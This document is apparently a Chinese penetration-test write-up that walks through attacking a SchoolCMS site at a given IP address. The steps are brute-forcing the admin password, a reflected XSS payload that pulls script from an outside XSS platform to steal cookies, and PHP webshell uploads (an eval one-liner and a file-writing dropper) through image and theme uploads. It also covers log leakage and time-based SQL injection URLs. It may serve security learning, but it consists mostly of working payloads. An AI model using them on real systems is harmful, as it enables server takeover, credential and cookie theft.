目录
SchoolCms漏洞渗透测试
站点首页:
信息收集
检索ip信息,扫描
namp扫描端口
信息收集,爆破目录
使用御剑扫描
扫描端口
通过爆破的目录,我们可以发现,目录下有一个压缩包,我们尝试下载
可下载:
下载后打开,发现是网站的源码
一、弱口令爆破
尝试进入后台:
进入后台,进行爆破密码 爆破后台密码
首先尝试登录:尝试admin账号,密码随意
说明账号存在,但密码错误。
接下来进行爆破密码 抓包,将数据信息发给Intruder
使用狙击手模式。确定了用户,爆破密码。
选择密码字典
等待过后,观察发现,发现不同的长度,尝试是否为密码
密码正确,成功登录后台 密码为lovelove
二、XSS
反射型XSS
在后台的学生管理,成绩管理,教师管理,文章管理等多处,存在xss跨站脚本攻击 以文章管理为例,此处为反射型XSS
在文章管理处,发现一处存在xss 获取cookie信息
在交换框当中输入攻击语句
</tExtArEa>'"><sCRiPt sRC=//xss.yt/nFtJ></sCrIpT>
在xss平台查看动态
复制对应的url和cookie信息,看是否能够实现跳转 回到网站的首页
执行成功后,成功跳转到网站的后台
存储型XSS
xss存储型
前端界面,出现弹窗
每个对应的栏都会出现弹窗,存在存储型XSS
三、文件上传漏洞
站点配置-->站点设置存在文件上传点
方式一: 上传文件,验证是否能被解析,写入一个木马,直接进行连接 方式二: 创建木马文件,写入木马,进行连接
验证是否存在文件上传漏洞,获取服务器的shell
接下来我们进行抓包,将php语句插入到图片的后面,看服务器是否能解析
将php语句插入到图片当中,然后放包即可
接下来到文件上传点,鼠标右键点击检查,查看代码,找到文件的上传点,访问试试
接下来我们进行访问此上传文件的链接 不难发现我们上传的文件变成了.php文件
访问链接后,发现此文件当中的php语句已经被解析
同理,我们可以将php测试语句换成php一句话木马,直接使用蚁剑进行连接
抓包获取数据,将php一句话木马写进图片码当中
追加一句话木马
同理,去找到文件上传的对应链接,然后去访问
打开hackbar,执行php语句,看是否能被解析
通过蚁剑去连接
成功拿到服务器shell
方式二,在文件上传的目录下,去创建一个木马文件,并写入木马,相同的原理,之不过就是在图片码的后面,加上一句php创建并写入文件的语句
<?php fwrite(fopen("shell.php","w"),'<?php @eval($_POST["lc"]);?>');?>
方法同以上一致,依旧抓包获取数据,将以上的语句插入到图片码当中去
放包以后,再去访问
我们猜测php语句已经被执行,接下来进行查看
访问上传路径下的文件,查看文件是否创建成功。
尝试切换到我们创建的文件当中去,来访问,输入php语句是否能被解析
成功被解析,通过哥斯拉连接,连接成功
成功拿到服务器shell
可查看服务器目录下的所有内容,可进行增加、修改和删除等等一系列操作!
主题管理--->主题安装存在文件上传
尝试上传压缩包
经过分析,将一张图片和一个php木马文件整合成一个文件夹,命名为shell_Html,然后打包压缩。
接下来进行上传:
抓包获取数据包信息,修改数据包,修改类型为zip,然后放包
验证是否上传成功,查看上传点
根据分析源码,该压缩包上传会被解压,解压后,文件夹会被拆开,然后拼接成文件,拼接的文件为文件夹(XX_Html)名中的XX+文件原来的名称。这里是shell_Html。所以文件名被修改为shellcmd.php和shellshell.png
通过观察可知道,主题上传的路径为 Application\Home\View\ 尝试访问新上传的文件夹当中的文件 Application\Home\View\shellcmd.php 看是否能被解析
php语句被成功解析
使用第三方工具,蚁剑或者哥斯拉进行连接,获取shell
成功获取服务器shell
成功获取服务器的shell,连接成功
回到服务器当中去查看验证:
成功上传,并成功获取了权限。
四、日志泄露
通过尝试验证,发现日志泄露
url地址:
http://43.143.169.215/Application/Runtime/Logs/Home/23_05_23.log ---跟日期 年份_月份_日期.log
访问过后,成功回显。并下载
查看下载后的日志内容
五、SQL注入
通过尝试,结果观察,发现后台存在sql注入点
注入点:
index.php?m=Admin&c=Article&a=SaveInfo
注入语句:
index.php?m=Admin&c=Article&a=SaveInfo&id[where]=id=3 and sleep(10)--+
访问:
http://43.143.169.215/index.php?m=Admin&c=Article&a=SaveInfo&id[where]=id=3 and sleep(10)--+
延迟后显示:
抓包看其变化:
正常下:
注入后:
成功延时
第二处注入点:
http://ip/schoolcms/index.php?m=Admin&c=Article&a=Index
此次存在sql注入,执行删除操作时进行抓包查看其变化
注入点:
http://ip/schoolcms/index.php?m=Admin&c=Article&a=Delete的数据包当中,
在数据包修改原始数据
添加id[where]=id=1+or+sleep(5)
执行删除的操作,观察url信息变化,抓包抓取数据信息,修改数据包,尝试sql注入。
正常情况下:
注入后:
sleep()中的延迟时间随意。
修改完后,放包观察其变化
成功延时
解码后:
文章不妥之处,欢迎批评指正!